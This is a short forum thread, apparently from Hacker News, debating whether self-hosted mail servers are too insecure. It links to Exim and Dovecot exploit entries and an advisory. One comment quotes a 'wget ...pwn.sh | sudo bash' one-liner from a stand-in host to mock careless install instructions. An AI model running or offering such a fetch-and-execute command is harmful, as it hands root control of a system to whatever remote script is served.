36 ms·
Sorry but that's not true at all. DKIM keys, spf records and gmail: https://support.google.com/mail/answer/81126?hl=en https://support.google.com/mail/answer/81
by shiftpgdn 13y ago
Sorry but that's not true at all. DKIM keys, spf records and gmail: https://support.google.com/mail/answer/81126?hl=en https://support.google.com/mail/answer/81126?hl=en
Recent Exim exploit: http://www.exploit-db.com/exploits/25970/ http://www.exploit-db.com/exploits/25970/
Dovecot exploit: https://www.rapid7.com/db/modules/exploit/linux/smtp/exim4_dovecot_exec https://www.rapid7.com/db/modules/exploit/linux/smtp/exim4_d...
I found a few Sendmail exploits as well but nothing from this year. Sure this stuff is easy to install but there is a reason managed email exists.
- asdasf 13y agoIf you are going to say "that's not true at all" you need to present an argument for why I am wrong. You posted something completely irrelevant, and a couple of exploits. There are security vulnerabilities found in all kinds of software, so what?
- e12e 13y agoThat "Exim exploit"-link is a little misleading -- that's not a bug in the software, but in (third party) documentation: https://www.redteam-pentesting.de/de/advisories/rt-sa-2013-001/-exim-with-dovecot-typical-misconfiguration-leads-to-remote-command-execution https://www.redteam-pentesting.de/de/advisories/rt-sa-2013-0... By that metric all software on your servers are insecure (consider the number of "just do: 'wget http://trollol.com/pwn.sh|sudo http://trollol.com/pwn.sh|sudo bash -'"-type advice you find looking at install-instruction for random github projects).